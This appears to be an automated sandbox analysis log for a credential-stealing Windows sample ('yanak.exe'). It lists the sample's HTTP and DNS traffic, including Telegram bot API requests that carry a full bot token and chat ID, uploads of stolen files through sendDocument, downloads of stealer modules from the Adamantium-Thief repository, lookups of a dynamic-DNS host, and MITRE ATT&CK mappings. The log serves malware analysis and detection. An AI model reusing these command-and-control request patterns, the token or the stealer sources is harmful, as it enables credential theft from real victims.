GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%92%AC%20Active%20window:%20Task%20Manager

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293343

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293344

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293345

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%83%20Uploading%20file...

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll

tls, http

yanak.exe

17.7kB
995.7kB
368
724

HTTP Request

GET https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dll

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium.dll

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendDocument?chat_id=5569740835

tls, http

yanak.exe

1.6kB
7.3kB
12
14

HTTP Request

POST https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendDocument?chat_id=5569740835

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendDocument?chat_id=5569740835

tls, http

yanak.exe

1.6kB
7.3kB
12
14

HTTP Request

POST https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendDocument?chat_id=5569740835

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342

tls, http

yanak.exe

2.5kB
10.0kB
23
18

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342

HTTP Response

200
149.154.167.220:443

api.telegram.org

tls

1.0kB
11.5kB
7
17

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

104.219.191.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.219.191.52.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

72.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

72.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

134 B
254 B
2
2

DNS Request

riprealworld.ddns.net

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

google.com

dns

yanak.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.187.238
8.8.8.8:53

api.telegram.org

dns

yanak.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

raw.githubusercontent.com

dns

yanak.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.111.133

185.199.108.133

185.199.110.133

185.199.109.133
8.8.8.8:53

133.111.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.111.199.185.in-addr.arpa
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

134 B
127 B
2
1

DNS Request

riprealworld.ddns.net

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

67 B
127 B
1
1

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

134 B
254 B
2
2

DNS Request

riprealworld.ddns.net

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

134 B
254 B
2
2

DNS Request

riprealworld.ddns.net

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

134 B
254 B
2
2

DNS Request

riprealworld.ddns.net

DNS Request

riprealworld.ddns.net
8.8.8.8:53

riprealworld.ddns.net

dns

Windows.exe

134 B
254 B
2
2

DNS Request

riprealworld.ddns.net

DNS Request

riprealworld.ddns.net

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery